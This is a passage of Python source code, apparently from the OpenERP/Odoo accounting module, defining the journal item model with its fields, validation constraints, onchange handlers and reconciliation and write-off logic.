self.pool.get('account.move').browse(cr, uid, ids, context=context):\n for line in move.line_id:\n result.append(line.id)\n return result\n\n def _get_reconcile(self, cr, uid, ids,name, unknow_none, context=None):\n res = dict.fromkeys(ids, False)\n for line in self.browse(cr, uid, ids, context=context):\n if line.reconcile_id:\n res[line.id] = str(line.reconcile_id.name)\n elif line.reconcile_partial_id:\n res[line.id] = str(line.reconcile_partial_id.name)\n return res\n\n def _get_move_from_reconcile(self, cr, uid, ids, context=None):\n move = {}\n for r in self.pool.get('account.move.reconcile').browse(cr, uid, ids, context=context):\n for line in r.line_partial_ids:\n move[line.move_id.id] = True\n for line in r.line_id:\n move[line.move_id.id] = True\n move_line_ids = []\n if move:\n move_line_ids = self.pool.get('account.move.line').search(cr, uid, [('journal_id','in',move.keys())], context=context)\n return move_line_ids\n\n\n _columns = {\n 'name': fields.char('Name', required=True),\n 'quantity': fields.float('Quantity', digits=(16,2), help=\"The optional quantity expressed by this line, eg: number of product sold. The quantity is not a legal requirement but is very useful for some reports.\"),\n 'product_uom_id': fields.many2one('product.uom', 'Unit of Measure'),\n 'product_id': fields.many2one('product.product', 'Product'),\n 'debit': fields.float('Debit', digits_compute=dp.get_precision('Account')),\n 'credit': fields.float('Credit', digits_compute=dp.get_precision('Account')),\n 'account_id': fields.many2one('account.account', 'Account', required=True, ondelete=\"cascade\", domain=[('type','<>','view'), ('type', '<>', 'closed')], select=2),\n 'move_id': fields.many2one('account.move', 'Journal Entry', ondelete=\"cascade\", help=\"The move of this entry line.\", select=2, required=True),\n 'narration': fields.related('move_id','narration', type='text', relation='account.move', string='Internal Note'),\n 'ref': fields.related('move_id', 'ref', string='Reference', type='char', store=True),\n 'statement_id': fields.many2one('account.bank.statement', 'Statement', help=\"The bank statement used for bank reconciliation\", select=1, copy=False),\n 'reconcile_id': fields.many2one('account.move.reconcile', 'Reconcile', readonly=True, ondelete='set null', select=2, copy=False),\n 'reconcile_partial_id': fields.many2one('account.move.reconcile', 'Partial Reconcile', readonly=True, ondelete='set null', select=2, copy=False),\n 'reconcile_ref': fields.function(_get_reconcile, type='char', string='Reconcile Ref', oldname='reconcile', store={\n 'account.move.line': (lambda self, cr, uid, ids, c={}: ids, ['reconcile_id','reconcile_partial_id'], 50),'account.move.reconcile': (_get_move_from_reconcile, None, 50)}),\n 'amount_currency': fields.float('Amount Currency', help=\"The amount expressed in an optional other currency if it is a multi-currency entry.\", digits_compute=dp.get_precision('Account')),\n 'amount_residual_currency': fields.function(_amount_residual, string='Residual Amount in Currency', multi=\"residual\", help=\"The residual amount on a receivable or payable of a journal entry expressed in its currency (maybe different of the company currency).\"),\n 'amount_residual': fields.function(_amount_residual, string='Residual Amount', multi=\"residual\", help=\"The residual amount on a receivable or payable of a journal entry expressed in the company currency.\"),\n 'currency_id': fields.many2one('res.currency', 'Currency', help=\"The optional other currency if it is a multi-currency entry.\"),\n 'journal_id': fields.related('move_id', 'journal_id', string='Journal', type='many2one', relation='account.journal', required=True, select=True,\n store = {\n 'account.move': (_get_move_lines, ['journal_id'], 20)\n }),\n 'period_id': fields.related('move_id', 'period_id', string='Period', type='many2one', relation='account.period', required=True, select=True,\n store = {\n 'account.move': (_get_move_lines, ['period_id'], 20)\n }),\n 'blocked': fields.boolean('No Follow-up', help=\"You can check this box to mark this journal item as a litigation with the associated partner\"),\n 'partner_id': fields.many2one('res.partner', 'Partner', select=1, ondelete='restrict'),\n 'date_maturity': fields.date('Due date', select=True ,help=\"This field is used for payable and receivable journal entries. You can put the limit date for the payment of this line.\"),\n 'date': fields.related('move_id','date', string='Effective date', type='date', required=True, select=True,\n store = {\n 'account.move': (_get_move_lines, ['date'], 20)\n }),\n 'date_created': fields.date('Creation date', select=True),\n 'analytic_lines': fields.one2many('account.analytic.line', 'move_id', 'Analytic lines'),\n 'centralisation': fields.selection([('normal','Normal'),('credit','Credit Centralisation'),('debit','Debit Centralisation'),('currency','Currency Adjustment')], 'Centralisation', size=8),\n 'balance': fields.function(_balance, fnct_search=_balance_search, string='Balance'),\n 'state': fields.selection([('draft','Unbalanced'), ('valid','Balanced')], 'Status', readonly=True, copy=False),\n 'tax_code_id': fields.many2one('account.tax.code', 'Tax Account', help=\"The Account can either be a base tax code or a tax code account.\"),\n 'tax_amount': fields.float('Tax/Base Amount', digits_compute=dp.get_precision('Account'), select=True, help=\"If the Tax account is a tax code account, this field will contain the taxed amount.If the tax account is base tax code, \"\\\n \"this field will contain the basic amount(without tax).\"),\n 'invoice': fields.function(_invoice, string='Invoice',\n type='many2one', relation='account.invoice', fnct_search=_invoice_search),\n 'account_tax_id':fields.many2one('account.tax', 'Tax', copy=False),\n 'analytic_account_id': fields.many2one('account.analytic.account', 'Analytic Account'),\n 'company_id': fields.related('account_id', 'company_id', type='many2one', relation='res.company',\n string='Company', store=True, readonly=True)\n }\n\n def _get_date(self, cr, uid, context=None):\n if context is None:\n context or {}\n period_obj = self.pool.get('account.period')\n dt = time.strftime('%Y-%m-%d')\n if context.get('journal_id') and context.get('period_id'):\n cr.execute('SELECT date FROM account_move_line ' \\\n 'WHERE journal_id = %s AND period_id = %s ' \\\n 'ORDER BY id DESC limit 1',\n (context['journal_id'], context['period_id']))\n res = cr.fetchone()\n if res:\n dt = res[0]\n else:\n period = period_obj.browse(cr, uid, context['period_id'], context=context)\n dt = period.date_start\n return dt\n\n def _get_currency(self, cr, uid, context=None):\n if context is None:\n context = {}\n if not context.get('journal_id', False):\n return False\n cur = self.pool.get('account.journal').browse(cr, uid, context['journal_id']).currency\n return cur and cur.id or False\n\n def _get_period(self, cr, uid, context=None):\n \"\"\"\n Return default account period value\n \"\"\"\n context = context or {}\n if context.get('period_id', False):\n return context['period_id']\n account_period_obj = self.pool.get('account.period')\n ids = account_period_obj.find(cr, uid, context=context)\n period_id = False\n if ids:\n period_id = ids[0]\n return period_id\n\n def _get_journal(self, cr, uid, context=None):\n \"\"\"\n Return journal based on the journal type\n \"\"\"\n context = context or {}\n if context.get('journal_id', False):\n return context['journal_id']\n journal_id = False\n\n journal_pool = self.pool.get('account.journal')\n if context.get('journal_type', False):\n jids = journal_pool.search(cr, uid, [('type','=', context.get('journal_type'))])\n if not jids:\n model, action_id = self.pool['ir.model.data'].get_object_reference(cr, uid, 'account', 'action_account_journal_form')\n msg = _(\"\"\"Cannot find any account journal of \"%s\" type for this company, You should create one.\\n Please go to Journal Configuration\"\"\") % context.get('journal_type').replace('_', ' ').title()\n raise openerp.exceptions.RedirectWarning(msg, action_id, _('Go to the configuration panel'))\n journal_id = jids[0]\n return journal_id\n\n\n _defaults = {\n 'blocked': False,\n 'centralisation': 'normal',\n 'date': _get_date,\n 'date_created': fields.date.context_today,\n 'state': 'draft',\n 'currency_id': _get_currency,\n 'journal_id': _get_journal,\n 'credit': 0.0,\n 'debit': 0.0,\n 'amount_currency': 0.0,\n 'account_id': lambda self, cr, uid, c: c.get('account_id', False),\n 'period_id': _get_period,\n 'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'account.move.line', context=c)\n }\n _order = \"date desc, id desc\"\n _sql_constraints = [\n ('credit_debit1', 'CHECK (credit*debit=0)', 'Wrong credit or debit value in accounting entry !'),\n ('credit_debit2', 'CHECK (credit+debit>=0)', 'Wrong credit or debit value in accounting entry !'),\n ]\n\n def _auto_init(self, cr, context=None):\n res = super(account_move_line, self)._auto_init(cr, context=context)\n cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = \\'account_move_line_journal_id_period_id_index\\'')\n if not cr.fetchone():\n cr.execute('CREATE INDEX account_move_line_journal_id_period_id_index ON account_move_line (journal_id, period_id)')\n cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = %s', ('account_move_line_date_id_index',))\n if not cr.fetchone():\n cr.execute('CREATE INDEX account_move_line_date_id_index ON account_move_line (date DESC, id desc)')\n return res\n\n def _check_no_view(self, cr, uid, ids, context=None):\n lines = self.browse(cr, uid, ids, context=context)\n for l in lines:\n if l.account_id.type in ('view', 'consolidation'):\n return False\n return True\n\n def _check_no_closed(self, cr, uid, ids, context=None):\n lines = self.browse(cr, uid, ids, context=context)\n for l in lines:\n if l.account_id.type == 'closed':\n raise osv.except_osv(_('Error!'), _('You cannot create journal items on a closed account %s %s.') % (l.account_id.code, l.account_id.name))\n return True\n\n def _check_company_id(self, cr, uid, ids, context=None):\n lines = self.browse(cr, uid, ids, context=context)\n for l in lines:\n if l.company_id != l.account_id.company_id or l.company_id != l.period_id.company_id:\n return False\n return True\n\n def _check_date(self, cr, uid, ids, context=None):\n for l in self.browse(cr, uid, ids, context=context):\n if l.journal_id.allow_date:\n if not time.strptime(l.date[:10],'%Y-%m-%d') >= time.strptime(l.period_id.date_start, '%Y-%m-%d') or not time.strptime(l.date[:10], '%Y-%m-%d') <= time.strptime(l.period_id.date_stop, '%Y-%m-%d'):\n return False\n return True\n\n def _check_currency(self, cr, uid, ids, context=None):\n for l in self.browse(cr, uid, ids, context=context):\n if l.account_id.currency_id:\n if not l.currency_id or not l.currency_id.id == l.account_id.currency_id.id:\n return False\n return True\n\n def _check_currency_and_amount(self, cr, uid, ids, context=None):\n for l in self.browse(cr, uid, ids, context=context):\n if (l.amount_currency and not l.currency_id):\n return False\n return True\n\n def _check_currency_amount(self, cr, uid, ids, context=None):\n for l in self.browse(cr, uid, ids, context=context):\n if l.amount_currency:\n if (l.amount_currency > 0.0 and l.credit > 0.0) or (l.amount_currency < 0.0 and l.debit > 0.0):\n return False\n return True\n\n def _check_currency_company(self, cr, uid, ids, context=None):\n for l in self.browse(cr, uid, ids, context=context):\n if l.currency_id.id == l.company_id.currency_id.id:\n return False\n return True\n\n _constraints = [\n (_check_no_view, 'You cannot create journal items on an account of type view or consolidation.', ['account_id']),\n (_check_no_closed, 'You cannot create journal items on closed account.', ['account_id']),\n (_check_company_id, 'Account and Period must belong to the same company.', ['company_id']),\n (_check_date, 'The date of your Journal Entry is not in the defined period! You should change the date or remove this constraint from the journal.', ['date']),\n (_check_currency, 'The selected account of your Journal Entry forces to provide a secondary currency. You should remove the secondary currency on the account or select a multi-currency view on the journal.', ['currency_id']),\n (_check_currency_and_amount, \"You cannot create journal items with a secondary currency without recording both 'currency' and 'amount currency' field.\", ['currency_id','amount_currency']),\n (_check_currency_amount, 'The amount expressed in the secondary currency must be positive when account is debited and negative when account is credited.', ['amount_currency']),\n (_check_currency_company, \"You cannot provide a secondary currency if it is the same than the company one.\" , ['currency_id']),\n ]\n\n #TODO: ONCHANGE_ACCOUNT_ID: set account_tax_id\n def onchange_currency(self, cr, uid, ids, account_id, amount, currency_id, date=False, journal=False, context=None):\n if context is None:\n context = {}\n account_obj = self.pool.get('account.account')\n journal_obj = self.pool.get('account.journal')\n currency_obj = self.pool.get('res.currency')\n if (not currency_id) or (not account_id):\n return {}\n result = {}\n acc = account_obj.browse(cr, uid, account_id, context=context)\n if (amount>0) and journal:\n x = journal_obj.browse(cr, uid, journal).default_credit_account_id\n if x: acc = x\n context = dict(context)\n context.update({\n 'date': date,\n 'res.currency.compute.account': acc,\n })\n v = currency_obj.compute(cr, uid, currency_id, acc.company_id.currency_id.id, amount, context=context)\n result['value'] = {\n 'debit': v > 0 and v or 0.0,\n 'credit': v < 0 and -v or 0.0\n }\n return result\n\n def onchange_partner_id(self, cr, uid, ids, move_id, partner_id, account_id=None, debit=0, credit=0, date=False, journal=False, context=None):\n partner_obj = self.pool.get('res.partner')\n payment_term_obj = self.pool.get('account.payment.term')\n journal_obj = self.pool.get('account.journal')\n fiscal_pos_obj = self.pool.get('account.fiscal.position')\n val = {}\n val['date_maturity'] = False\n\n if not partner_id:\n return {'value':val}\n if not date:\n date = datetime.now().strftime('%Y-%m-%d')\n jt = False\n if journal:\n jt = journal_obj.browse(cr, uid, journal, context=context).type\n part = partner_obj.browse(cr, uid, partner_id, context=context)\n\n payment_term_id = False\n if jt and jt in ('purchase', 'purchase_refund') and part.property_supplier_payment_term:\n payment_term_id = part.property_supplier_payment_term.id\n elif jt and part.property_payment_term:\n payment_term_id = part.property_payment_term.id\n if payment_term_id:\n res = payment_term_obj.compute(cr, uid, payment_term_id, 100, date)\n if res:\n val['date_maturity'] = res[0][0]\n if not account_id:\n id1 = part.property_account_payable.id\n id2 = part.property_account_receivable.id\n if jt:\n if jt in ('sale', 'purchase_refund'):\n val['account_id'] = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, id2)\n elif jt in ('purchase', 'sale_refund'):\n val['account_id'] = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, id1)\n elif jt in ('general', 'bank', 'cash'):\n if part.customer:\n val['account_id'] = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, id2)\n elif part.supplier:\n val['account_id'] = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, id1)\n if val.get('account_id', False):\n d = self.onchange_account_id(cr, uid, ids, account_id=val['account_id'], partner_id=part.id, context=context)\n val.update(d['value'])\n return {'value':val}\n\n def onchange_account_id(self, cr, uid, ids, account_id=False, partner_id=False, context=None):\n account_obj = self.pool.get('account.account')\n partner_obj = self.pool.get('res.partner')\n fiscal_pos_obj = self.pool.get('account.fiscal.position')\n val = {}\n if account_id:\n res = account_obj.browse(cr, uid, account_id, context=context)\n tax_ids = res.tax_ids\n if tax_ids and partner_id:\n part = partner_obj.browse(cr, uid, partner_id, context=context)\n tax_id = fiscal_pos_obj.map_tax(cr, uid, part and part.property_account_position or False, tax_ids)[0]\n else:\n tax_id = tax_ids and tax_ids[0].id or False\n val['account_tax_id'] = tax_id\n return {'value': val}\n #\n # type: the type if reconciliation (no logic behind this field, for info)\n #\n # writeoff; entry generated for the difference between the lines\n #\n def search(self, cr, uid, args, offset=0, limit=None, order=None, context=None, count=False):\n if context is None:\n context = {}\n if context.get('fiscalyear'):\n args.append(('period_id.fiscalyear_id', '=', context.get('fiscalyear', False)))\n if context and context.get('next_partner_only', False):\n if not context.get('partner_id', False):\n partner = self.list_partners_to_reconcile(cr, uid, context=context)\n if partner:\n partner = partner[0]\n else:\n partner = context.get('partner_id', False)\n if not partner:\n return []\n args.append(('partner_id', '=', partner[0]))\n return super(account_move_line, self).search(cr, uid, args, offset, limit, order, context, count)\n\n def prepare_move_lines_for_reconciliation_widget(self, cr, uid, lines, target_currency=False, target_date=False, context=None):\n \"\"\" Returns move lines formatted for the manual/bank reconciliation widget\n\n :param target_currency: curreny you want the move line debit/credit converted into\n :param target_date: date to use for the monetary conversion\n \"\"\"\n if not lines:\n return []\n if context is None:\n context = {}\n ctx = context.copy()\n currency_obj = self.pool.get('res.currency')\n company_currency = self.pool.get('res.users').browse(cr, uid, uid, context=context).company_id.currency_id\n rml_parser = report_sxw.rml_parse(cr, uid, 'reconciliation_widget_aml', context=context)\n ret = []\n\n for line in lines:\n partial_reconciliation_siblings_ids = []\n if line.reconcile_partial_id:\n partial_reconciliation_siblings_ids = self.search(cr, uid, [('reconcile_partial_id', '=', line.reconcile_partial_id.id)], context=context)\n partial_reconciliation_siblings_ids.remove(line.id)\n\n ret_line = {\n 'id': line.id,\n 'name': line.name != '/' and line.move_id.name + ': ' + line.name or line.move_id.name,\n 'ref': line.move_id.ref,\n 'account_code': line.account_id.code,\n 'account_name': line.account_id.name,\n 'account_type': line.account_id.type,\n 'date_maturity': line.date_maturity,\n 'date': line.date,\n 'period_name': line.period_id.name,\n 'journal_name': line.journal_id.name,\n 'partner_id': line.partner_id.id,\n 'partner_name': line.partner_id.name,\n 'is_partially_reconciled': bool(line.reconcile_partial_id),\n 'partial_reconciliation_siblings_ids': partial_reconciliation_siblings_ids,\n }\n\n # Amount residual can be negative\n debit = line.debit\n credit = line.credit\n total_amount = abs(debit - credit)\n total_amount_currency = line.amount_currency\n amount_residual = line.amount_residual\n amount_residual_currency = line.amount_residual_currency\n if line.amount_residual < 0:\n debit, credit = credit, debit\n amount_residual = -amount_residual\n amount_residual_currency = -amount_residual_currency\n\n # Get right debit / credit:\n line_currency = line.currency_id or company_currency\n amount_currency_str = \"\"\n total_amount_currency_str = \"\"\n if line.currency_id and line.amount_currency:\n amount_currency_str = rml_parser.formatLang(amount_residual_currency, currency_obj=line.currency_id)\n total_amount_currency_str = rml_parser.formatLang(total_amount_currency, currency_obj=line.currency_id)\n if target_currency and line_currency == target_currency and target_currency != company_currency:\n debit = debit > 0 and amount_residual_currency or 0.0\n credit = credit > 0 and amount_residual_currency or 0.0\n amount_currency_str = rml_parser.formatLang(amount_residual, currency_obj=company_currency)\n total_amount_currency_str = rml_parser.formatLang(total_amount, currency_obj=company_currency)\n amount_str = rml_parser.formatLang(debit or credit, currency_obj=target_currency)\n total_amount_str = rml_parser.formatLang(total_amount_currency, currency_obj=target_currency)\n else:\n debit = debit > 0 and amount_residual or 0.0\n credit = credit > 0 and amount_residual or 0.0\n amount_str = rml_parser.formatLang(debit or credit, currency_obj=company_currency)\n total_amount_str = rml_parser.formatLang(total_amount, currency_obj=company_currency)\n if target_currency and target_currency != company_currency:\n amount_currency_str = rml_parser.formatLang(debit or credit, currency_obj=line_currency)\n total_amount_currency_str = rml_parser.formatLang(total_amount, currency_obj=line_currency)\n ctx = context.copy()\n if target_date:\n ctx.update({'date': target_date})\n debit = currency_obj.compute(cr, uid, company_currency.id, target_currency.id, debit, context=ctx)\n credit = currency_obj.compute(cr, uid, company_currency.id, target_currency.id, credit, context=ctx)\n amount_str = rml_parser.formatLang(debit or credit, currency_obj=target_currency)\n total_amount = currency_obj.compute(cr, uid, company_currency.id, target_currency.id, total_amount, context=ctx)\n total_amount_str = rml_parser.formatLang(total_amount, currency_obj=target_currency)\n\n ret_line['credit'] = credit\n ret_line['debit'] = debit\n ret_line['amount_str'] = amount_str\n ret_line['amount_currency_str'] = amount_currency_str\n ret_line['total_amount_str'] = total_amount_str # For partial reconciliations\n ret_line['total_amount_currency_str'] = total_amount_currency_str\n ret.append(ret_line)\n return ret\n\n def list_partners_to_reconcile(self, cr, uid, context=None):\n cr.execute(\n \"\"\"SELECT partner_id FROM (\n SELECT l.partner_id, p.last_reconciliation_date, SUM(l.debit) AS debit, SUM(l.credit) AS credit, MAX(l.create_date) AS max_date\n FROM account_move_line l\n RIGHT JOIN account_account a ON (a.id = l.account_id)\n RIGHT JOIN res_partner p ON (l.partner_id = p.id)\n WHERE a.reconcile IS TRUE\n AND l.reconcile_id IS NULL\n AND l.state <> 'draft'\n GROUP BY l.partner_id, p.last_reconciliation_date\n ) AS s\n WHERE debit > 0 AND credit > 0 AND (last_reconciliation_date IS NULL OR max_date > last_reconciliation_date)\n ORDER BY last_reconciliation_date\"\"\")\n ids = [x[0] for x in cr.fetchall()]\n if not ids:\n return []\n\n # To apply the ir_rules\n partner_obj = self.pool.get('res.partner')\n ids = partner_obj.search(cr, uid, [('id', 'in', ids)], context=context)\n return partner_obj.name_get(cr, uid, ids, context=context)\n\n def reconcile_partial(self, cr, uid, ids, type='auto', context=None, writeoff_acc_id=False, writeoff_period_id=False, writeoff_journal_id=False):\n move_rec_obj = self.pool.get('account.move.reconcile')\n merges = []\n unmerge = []\n total = 0.0\n merges_rec = []\n company_list = []\n if context is None:\n context = {}\n for line in self.browse(cr, uid, ids, context=context):\n if company_list and not line.company_id.id in company_list:\n raise osv.except_osv(_('Warning!'), _('To reconcile the entries company should be the same for all entries.'))\n company_list.append(line.company_id.id)\n\n for line in self.browse(cr, uid, ids, context=context):\n if line.account_id.currency_id:\n currency_id = line.account_id.currency_id\n else:\n currency_id = line.company_id.currency_id\n if line.reconcile_id:\n raise osv.except_osv(_('Warning'), _(\"Journal Item '%s' (id: %s), Move '%s' is already reconciled!\") % (line.name, line.id, line.move_id.name))\n if line.reconcile_partial_id:\n for line2 in line.reconcile_partial_id.line_partial_ids:\n if line2.state != 'valid':\n raise osv.except_osv(_('Warning'), _(\"Journal Item '%s' (id: %s) cannot be used in a reconciliation as it is not balanced!\") % (line2.name, line2.id))\n if not line2.reconcile_id:\n if line2.id not in merges:\n merges.append(line2.id)\n if line2.account_id.currency_id:\n total += line2.amount_currency\n else:\n total += (line2.debit or 0.0) - (line2.credit or 0.0)\n merges_rec.append(line.reconcile_partial_id.id)\n else:\n unmerge.append(line.id)\n if line.account_id.currency_id:\n total += line.amount_currency\n else:\n total += (line.debit or 0.0) - (line.credit or 0.0)\n if self.pool.get('res.currency').is_zero(cr, uid, currency_id, total):\n res = self.reconcile(cr, uid, merges+unmerge, context=context, writeoff_acc_id=writeoff_acc_id, writeoff_period_id=writeoff_period_id, writeoff_journal_id=writeoff_journal_id)\n return res\n # marking the lines as reconciled does not change their validity, so there is no need\n # to revalidate their moves completely.\n reconcile_context = dict(context, novalidate=True)\n r_id = move_rec_obj.create(cr, uid, {\n 'type': type,\n 'line_partial_ids': map(lambda x: (4,x,False), merges+unmerge)\n }, context=reconcile_context)\n move_rec_obj.reconcile_partial_check(cr, uid, [r_id] + merges_rec, context=reconcile_context)\n return r_id\n\n def reconcile(self, cr, uid, ids, type='auto', writeoff_acc_id=False, writeoff_period_id=False, writeoff_journal_id=False, context=None):\n account_obj = self.pool.get('account.account')\n move_obj = self.pool.get('account.move')\n move_rec_obj = self.pool.get('account.move.reconcile')\n partner_obj = self.pool.get('res.partner')\n currency_obj = self.pool.get('res.currency')\n lines = self.browse(cr, uid, ids, context=context)\n unrec_lines = filter(lambda x: not x['reconcile_id'], lines)\n credit = debit = 0.0\n currency = 0.0\n account_id = False\n partner_id = False\n if context is None:\n context = {}\n company_list = []\n for line in self.browse(cr, uid, ids, context=context):\n if company_list and not line.company_id.id in company_list:\n raise osv.except_osv(_('Warning!'), _('To reconcile the entries company should be the same for all entries.'))\n company_list.append(line.company_id.id)\n for line in unrec_lines:\n if line.state <> 'valid':\n raise osv.except_osv(_('Error!'),\n _('Entry \"%s\" is not valid !') % line.name)\n credit += line['credit']\n debit += line['debit']\n currency += line['amount_currency'] or 0.0\n account_id = line['account_id']['id']\n partner_id = (line['partner_id'] and line['partner_id']['id']) or False\n writeoff = debit - credit\n\n # Ifdate_p in context => take this date\n if context.has_key('date_p') and context['date_p']:\n date=context['date_p']\n else:\n date = time.strftime('%Y-%m-%d')\n\n cr.execute('SELECT account_id, reconcile_id '\\\n 'FROM account_move_line '\\\n 'WHERE id IN %s '\\\n 'GROUP BY account_id,reconcile_id',\n (tuple(ids), ))\n r = cr.fetchall()\n #TODO: move this check to a constraint in the account_move_reconcile object\n if len(r) != 1:\n raise osv.except_osv(_('Error'), _('Entries are not of the same account or already reconciled ! '))\n if not unrec_lines:\n raise osv.except_osv(_('Error!'), _('Entry is already reconciled.'))\n account = account_obj.browse(cr, uid, account_id, context=context)\n if not account.reconcile:\n raise osv.except_osv(_('Error'), _('The account is not defined to be reconciled !'))\n if r[0][1] != None:\n raise osv.except_osv(_('Error!'), _('Some entries are already reconciled.'))\n\n if (not currency_obj.is_zero(cr, uid, account.company_id.currency_id, writeoff)) or \\\n (account.currency_id and (not currency_obj.is_zero(cr, uid, account.currency_id, currency))):\n if not writeoff_acc_id:\n raise osv.except_osv(_('Warning!'), _('You have to provide an account for the write off/exchange difference entry.'))\n if writeoff > 0:\n debit = writeoff\n credit = 0.0\n self_credit = writeoff\n self_debit = 0.0\n else:\n debit = 0.0\n credit = -writeoff\n self_credit = 0.0\n self_debit = -writeoff\n # If comment exist in context, take it\n if 'comment' in context and context['comment']:\n libelle = context['comment']\n else:\n libelle = _('Write-Off')\n\n cur_obj = self.pool.get('res.currency')\n cur_id = False\n amount_currency_writeoff = 0.0\n if context.get('company_currency_id',False) != context.get('currency_id',False):\n cur_id = context.get('currency_id',False)\n for line in unrec_lines:\n if line.currency_id and line.currency_id.id == context.get('currency_id',False):\n amount_currency_writeoff += line.amount_currency\n else:\n tmp_amount = cur_obj.compute(cr, uid, line.account_id.company_id.currency_id.id, context.get('currency_id',False), abs(line.debit-line.credit), context={'date': line.date})\n amount_currency_writeoff += (line.debit > 0) and tmp_amount or -tmp_amount\n\n writeoff_lines = [\n (0, 0, {\n 'name': libelle,\n 'debit': self_debit,\n 'credit': self_credit,\n 'account_id': account_id,\n 'date': date,\n 'partner_id': partner_id,\n 'currency_id': cur_id or (account.currency_id.id or False),\n 'amount_currency': amount_currency_writeoff and -1 * amount_currency_writeoff or (account.currency_id.id and -1 * currency or 0.0)\n }),\n (0, 0, {\n 'name': libelle,\n 'debit': debit,\n 'credit': credit,\n 'account_id': writeoff_acc_id,\n 'analytic_account_id': context.get('analytic_id', False),\n 'date': date,\n 'partner_id': partner_id,\n 'currency_id': cur_id or (account.currency_id.id or False),\n 'amount_currency': amount_currency_writeoff and amount_currency_writeoff or (account.currency_id.id and currency or 0.0)\n })\n ]\n\n writeoff_move_id = move_obj.create(cr, uid, {\n 'period_id': writeoff_period_id,\n 'journal_id': writeoff_journal_id,\n 'date':date,\n 'state': 'draft',\n 'line_id': writeoff_lines\n })\n\n writeoff_line_ids = self.search(cr, uid, [('move_id', '=', writeoff_move_id), ('account_id', '=', account_id)])\n if account_id == writeoff_acc_id:\n writeoff_line_ids = [writeoff_line_ids[1]]\n ids += writeoff_line_ids\n\n # marking the lines as reconciled does not change their validity, so there is no need\n # to revalidate their moves completely.\n reconcile_context = dict(context, novalidate=True)\n r_id = move_rec_obj.create(cr, uid, {\n 'type': type,\n 'line_id': map(lambda x: (4, x, False), ids),\n 'line_partial_ids': map(lambda x: (3, x, False), ids)\n }, context=reconcile_context)\n # the id of the move.reconcile is written in the move.line (self) by the create method above\n # because of the way the line_id are defined: (4, x, False)\n for id in ids:\n workflow.trg_trigger(uid, 'account.move.line', id, cr)\n\n if lines and lines[0]:\n partner_id = lines[0].partner_id and lines[0].partner_id.id or False\n if partner_id and not partner_obj.has_something_to_reconcile(cr, uid, partner_id, context=context):\n partner_obj.mark_as_reconciled(cr, uid, [partner_id], context=context)\n return r_id\n\n def view_header_get(self, cr, user, view_id, view_type, context=None):\n if context is None:\n context = {}\n context = self.convert_to_period(cr, user, context=context)\n if context.get('account_id', False):\n cr.execute('SELECT code FROM account_account WHERE id = %s', (context['account_id'], ))\n res = cr.fetchone()\n if res:\n res = _('Entries: ')+ (res[0] or '')\n return res\n if (not context.get('journal_id', False)) or (not context.get('period_id', False)):\n return False\n if context.get('search_default_journal_id', False):\n context['journal_id'] = context.get('search_default_journal_id')\n cr.execute('SELECT code FROM account_journal WHERE id = %s', (context['journal_id'], ))\n j = cr.fetchone()[0] or ''\n cr.execute('SELECT code FROM account_period WHERE id = %s', (context['period_id'], ))\n p = cr.fetchone()[0] or ''\n if j or p:\n return j + (p and (':' + p) or '')\n return False\n\n def onchange_date(self, cr, user, ids, date, context=None):\n \"\"\"\n Returns a dict that contains new values and context\n @param cr: A database cursor\n @param user: ID of the user currently logged in\n @param date: latest value from user input for field date\n @param args: other arguments\n @param context: context arguments, like lang, time zone\n @return: Returns a dict which contains new values, and context\n \"\"\"\n res = {}\n if context is None:\n context = {}\n period_pool = self.pool.get('account.period')\n pids = period_pool.find(cr, user, date, context=context)\n if pids:\n res.update({'period_id':pids[0]})\n context = dict(context, period_id=pids[0])\n return {\n 'value':res,\n 'context':context,\n }\n\n def _check_moves(self, cr, uid, context=None):\n # use the first move ever created for this journal and period\n if context is None:\n context = {}\n cr.execute('SELECT id, state, name FROM account_move WHERE journal_id = %s AND period_id = %s ORDER BY id limit 1', (context['journal_id'],context['period_id']))\n res = cr.fetchone()\n if res:\n if res[1] != 'draft':\n raise osv.except_osv(_('User Error!'),\n _('The account move (%s) for centralisation ' \\\n 'has been confirmed.') % res[2])\n return res\n\n def _remove_move_reconcile(self, cr, uid, move_ids=None, opening_reconciliation=False, context=None):\n # Function remove move rencocile ids related with moves\n obj_move_line = self.pool.get('account.move.line')\n obj_move_rec = self.pool.get('account.move.reconcile')\n unlink_ids = []\n if not move_ids:\n return True\n recs = obj_move_line.read(cr, uid, move_ids, ['reconcile_id', 'reconcile_partial_id'])\n full_recs = filter(lambda x: x['reconcile_id'], recs)\n rec_ids = [rec['reconcile_id'][0] for rec in full_recs]\n part_recs = filter(lambda x: x['reconcile_partial_id'], recs)\n part_rec_ids = [rec['reconcile_partial_id'][0] for rec in part_recs]\n unlink_ids += rec_ids\n unlink_ids += part_rec_ids\n all_moves = obj_move_line.search(cr, uid, ['|',('reconcile_id', 'in', unlink_ids),('reconcile_partial_id', 'in', unlink_ids)])\n all_moves = list(set(all_moves) - set(move_ids))\n if unlink_ids:\n if opening_reconciliation:\n raise osv.except_osv(_('Warning!'),\n _('Opening Entries have already been generated. Please run \"Cancel Closing Entries\" wizard to cancel those entries and then run this wizard.'))\n obj_move_rec.write(cr, uid, unlink_ids, {'opening_reconciliation': False})\n obj_move_rec.unlink(cr, uid, unlink_ids)\n if len(all_moves) >= 2:\n obj_move_line.reconcile_partial(cr, uid, all_moves, 'auto',context=context)\n return True\n\n def unlink(self, cr, uid, ids, context=None, check=True):\n if context is None:\n context = {}\n move_obj = self.pool.get('account.move')\n self._update_check(cr, uid, ids, context)\n result = False\n move_ids = set()\n for line in self.browse(cr, uid, ids, context=context):\n move_ids.add(line.move_id.id)\n context['journal_id'] = line.journal_id.id\n context['period_id'] = line.period_id.id\n result = super(account_move_line, self).unlink(cr, uid, [line.id], context=context)\n move_ids = list(move_ids)\n if check and move_ids:\n move_obj.validate(cr, uid, move_ids, context=context)\n return result\n\n def write(self, cr, uid, ids, vals, context=None, check=True, update_check=True):\n if context is None:\n context={}\n move_obj = self.pool.get('account.move')\n account_obj = self.pool.get('account.account')\n journal_obj = self.pool.get('account.journal')\n if isinstance(ids, (int, long)):\n ids = [ids]\n if vals.get('account_tax_id', False):\n raise osv.except_osv(_('Unable to change tax!'), _('You cannot change the tax, you should remove and recreate lines.'))\n if ('account_id' in vals) and 